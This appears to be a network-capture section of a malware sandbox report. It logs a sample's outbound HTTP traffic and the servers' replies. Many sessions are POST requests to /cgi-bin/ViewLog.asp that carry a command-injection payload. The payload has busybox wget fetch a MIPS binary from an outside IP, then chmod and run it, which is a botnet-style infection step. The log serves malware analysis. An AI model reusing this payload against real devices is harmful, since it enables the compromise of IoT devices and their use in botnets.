                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:16.628501892 CET560INHTTP/1.1 404 Not Found
                                              Content-Type: text/html
                                              Content-Length: 341
                                              Connection: close
                                              Date: Thu, 23 Nov 2023 04:18:16 GMT
                                              Server: lighttpd/1.4.54
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 Not Found</title> </head> <body> <h1>404 Not Found</h1> </body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              772192.168.2.136017694.120.25.1758080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:16.430272102 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              773192.168.2.135469231.210.253.1368080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:16.608673096 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:17.235898972 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:17.432008982 CET427INHTTP/1.1 301 Moved Permanently
                                              Server: mini_httpd/1.19 19dec2003
                                              Date: Thu, 23 Nov 2023 04:18:17 GMT
                                              Content-Type: text/html; charset=%s
                                              Connection: close
                                              Data Raw: 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 20 4c 49 4e 4b 3d 22 23 32 30 32 30 66 66 22 20 56 4c 49 4e 4b 3d 22 23 34 30 34 30 63 63 22 3e 0a 3c 48 34 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 48 34 3e 0a 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 2e 0a 3c 48 52 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a
                                              Data Ascii: <HTML><HEAD><TITLE>301 Moved Permanently</TITLE></HEAD><BODY BGCOLOR="#cc9999" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc"><H4>301 Moved Permanently</H4>Moved Permanently.<HR></BODY></HTML>
                                              Nov 23, 2023 05:18:19.255386114 CET427INHTTP/1.1 301 Moved Permanently
                                              Server: mini_httpd/1.19 19dec2003
                                              Date: Thu, 23 Nov 2023 04:18:17 GMT
                                              Content-Type: text/html; charset=%s
                                              Connection: close
                                              Data Raw: 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 20 4c 49 4e 4b 3d 22 23 32 30 32 30 66 66 22 20 56 4c 49 4e 4b 3d 22 23 34 30 34 30 63 63 22 3e 0a 3c 48 34 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 48 34 3e 0a 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 2e 0a 3c 48 52 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a
                                              Data Ascii: <HTML><HEAD><TITLE>301 Moved Permanently</TITLE></HEAD><BODY BGCOLOR="#cc9999" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc"><H4>301 Moved Permanently</H4>Moved Permanently.<HR></BODY></HTML>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              774192.168.2.133598295.165.140.2368080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:16.626585960 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:16.837115049 CET687INHTTP/1.1 400 Bad Request
                                              Date: Thu, 23 Nov 2023 04:18:16 GMT
                                              Server: Apache/2.4.46 (Unix) OpenSSL/1.1.1c
                                              Strict-Transport-Security: max-age=15552000; includeSubDomains
                                              Content-Length: 362
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 52 65 61 73 6f 6e 3a 20 59 6f 75 27 72 65 20 73 70 65 61 6b 69 6e 67 20 70 6c 61 69 6e 20 48 54 54 50 20 74 6f 20 61 6e 20 53 53 4c 2d 65 6e 61 62 6c 65 64 20 73 65 72 76 65 72 20 70 6f 72 74 2e 3c 62 72 20 2f 3e 0a 20 49 6e 73 74 65 61 64 20 75 73 65 20 74 68 65 20 48 54 54 50 53 20 73 63 68 65 6d 65 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 55 52 4c 2c 20 70 6c 65 61 73 65 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br />Reason: You're speaking plain HTTP to an SSL-enabled server port.<br /> Instead use the HTTPS scheme to access this URL, please.<br /></p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              775192.168.2.136037094.188.131.728080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:16.659229040 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              776192.168.2.134479694.122.83.508080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:16.759059906 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              777192.168.2.1352400106.53.18.2123
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:16.867698908 CET219INHTTP/1.0 200 OK
                                              Server: Proxy
                                              Data Raw: 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 39 2e 31 34 39 2e 31 38 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 33 2d 31 31 2d 32 33 20 31 32 3a 31 37 3a 32 35 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 49 6e 76 61 6c 69 64 20 75 73 65 72 2e
                                              Data Ascii: Unauthorized ...IP Address: 89.149.18.60MAC Address: Server Time: 2023-11-23 12:17:25Auth Result: Invalid user.


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              778192.168.2.133982831.136.79.588080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:16.868717909 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:20.070173025 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              779192.168.2.134107094.121.125.2508080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:16.909221888 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              780192.168.2.135029431.200.3.418080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:16.909425974 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              781192.168.2.134011294.238.153.928080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:17.045259953 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:17.606281996 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:18.694180965 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              782192.168.2.135882695.179.154.808080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:17.050112009 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:17.235927105 CET680INHTTP/1.1 404
                                              Content-Type: text/html;charset=utf-8
                                              Content-Language: en
                                              Content-Length: 431
                                              Date: Thu, 23 Nov 2023 04:18:17 GMT
                                              Keep-Alive: timeout=5
                                              Connection: keep-alive
                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              783192.168.2.133592485.209.19.2178080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:17.168142080 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:17.353543997 CET360INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 23 Nov 2023 04:18:17 GMT
                                              Content-Type: text/html
                                              Content-Length: 146
                                              Connection: keep-alive
